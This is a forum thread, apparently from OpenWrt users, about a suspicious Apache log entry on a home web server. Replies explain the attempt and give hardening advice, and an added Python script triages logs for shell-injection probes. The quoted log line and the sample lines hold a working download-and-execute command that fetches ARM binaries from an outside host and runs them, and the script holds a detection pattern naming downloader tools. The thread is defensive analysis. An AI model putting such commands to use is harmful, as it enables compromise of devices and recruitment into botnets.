Is this a hack attempt and can this mean a security problem

I run OpenWrt 19.7.4 and I have installed apache as a webserver. Since the server is connected to the internet I saw a suspicious line in the access_log of the server and I wonder if anyone could help me out in trying to understand the nature of the line and if it could imply that there has been some sort of damage to my installation or that some data have been stolen. The line is:

157.245.100.146 - - [27/Feb/2021:18:22:24 +0100] "GET /shell?cd+/tmp;rm+arm+arm7;wget+http:/\/45.14.149.204/arm7;chmod+777+arm7;./arm7+jaws;wget+http:/\/45.14.149.204/arm;chmod+777+arm;./arm+jaws HTTP/1.1" 400 226

What worries me is the "GET /shell" and the "chmod+777".
Is there anyone who can clarify the content of this line?

That is indeed a hack attempt, but a proper configuration of apache should ignore it.

It would download and run additional software, which is (at least going by the name) targeted to a specific system with an ARM processor.

5 Likes

Without any protection (mod_security, fail2ban, reverse proxy, readonly filesystem,...)?

1 Like

Looks like someone rented out or compromised a DigitalOcean server to attack people from. You can report this to them here.

Fun fact, the "ISP" that the IP belongs to is a "perfume shop" in Romania. If you go to that IP there's a script there that downloads a binary, executes it with dlink as the parameter and pipes the output to a file, then uploads it to 205.185.122.102 which is owned by a nasty "ISP" based in California. It tries to use curl to upload but it fails with Received HTTP/0.9 when not allowed.

4 Likes

Ok, thank you. As far as I can see there was no damage done to my installation. But you wrote that a proper configuration of Apache should ignore the attack. As a matter of fact I did not do much configuration: after installation it was up and running. Could you be more specific on "proper configuration"?

It is best practice to post (potentially) malicious IP addresses with [.]'s for the delimiters and for links use hxxp:// instead of http://.

That won't do anything unless you have a CGI script at /shell in your web root.
It is likely targeting a specific vendor that has such a script.

You will see hundreds of such attempts in your logs, that is just the Internet background noise.

Your "default configuration" which just serves static files should be OK.
Although I personally recommend against running a web (or any) server unless it is confined by SELinux and sandboxed by systemd.

1 Like
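An added example, not part of any post in this thread: a small triage script for an Apache access log that URL-decodes each request, flags the ones carrying shell syntax like the line quoted at the top, and separates those the server refused (4xx/5xx) from those that got a normal answer. The function names, the pattern list, the status-code rule and the sample log lines are all assumptions made for this illustration.

```python
import re
from urllib.parse import unquote_plus

# Apache common log format: host ident user [time] "request" status size
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(.*?)" (\d{3}) (\S+)')

# Heuristic (assumption): shell separators and downloader/permission commands
# have no place in the URL of a site that only serves static files.
PROBE_RE = re.compile(r'(;|\||`|\$\(|&&)|\b(wget|curl|tftp|chmod|busybox)\b', re.I)

def triage(line):
    """Return None for ordinary requests, else a dict describing the probe."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, when, request, status, _size = m.groups()
    parts = request.split(" ")
    target = parts[1] if len(parts) >= 2 else request
    decoded = unquote_plus(target)  # '+' and %xx hide spaces and metacharacters
    if not PROBE_RE.search(decoded):
        return None
    code = int(status)
    # 4xx/5xx: the server refused or found nothing. 2xx/3xx: something answered.
    verdict = "rejected" if code >= 400 else "INVESTIGATE"
    return {"host": host, "time": when, "status": code,
            "verdict": verdict, "decoded": decoded}

def scan(lines):
    """Triage every line and keep only the flagged ones."""
    return [r for r in map(triage, lines) if r is not None]

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [27/Feb/2021:18:20:01 +0100] "GET /index.html HTTP/1.1" 200 1043',
    '203.0.113.9 - - [27/Feb/2021:18:22:24 +0100] '
    '"GET /shell?cd+/tmp;wget+http://192.0.2.1/arm7;chmod+777+arm7 HTTP/1.1" 400 226',
    '203.0.113.9 - - [27/Feb/2021:18:25:10 +0100] '
    '"GET /cgi-bin/status?ip=1%3Bwget%20http://192.0.2.1/x HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    for r in scan(SAMPLE):
        print(f'{r["verdict"]:11} {r["status"]} {r["host"]} {r["decoded"]}')
```

To check a real log, pass the open file to `scan()`; an "INVESTIGATE" row only means the request was answered with a success code, so the next step is to look at what actually lives at that path.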

Honestly: yes, without any protection (mod_security, fail2ban, reverse proxy, readonly filesystem,...?)
I thought that if port 80 was the only way to access the server, Apache was able to stand against attacks. This may appear to you not very professional, but I'm just a simple user and I have seen no recommendations for extra security measures when I installed Apache. Maybe you can be a little more specific on the risks I take with none of the precautions you suggested?

Might be a good idea to use something like a Raspberry Pi to run your web server. Separate hardware, no resource contention, you have more flexibility in distro choice (Debian/Ubuntu/etc). You can lock down the OS and web server in any way you like without touching your router's configuration. Makes it a bit easier to move your web server into a different subnet, choosing which hosts in your local network or outside your network are allowed to connect. Easier to do full block level backups, or just use some sort of CI/CD to deploy your web applications.

And if you get hacked, it's not necessarily an automatic game over because the bad guys have full unrestricted access to your router.

It's more work, but you'll sleep easier in the end.

3 Likes

Thank you. I looked up cURL, which I did not know. It is probably a powerful set of tools that could be misused.

Thanks. If you think I'm running the server on an ISP-router: no I don't; it is running OpenWrt on a separate Astoria VGV7519. I supposed that it could be used securely for serving only static page files. Maybe it is not.

I am not a web server security expert, but generally for me any server that is open to the internet has a risk of being cracked (buffer overflow,...). But you seem to have already followed one piece of security advice (running the web server on dedicated hardware and not on the same device as your firewall).

1 Like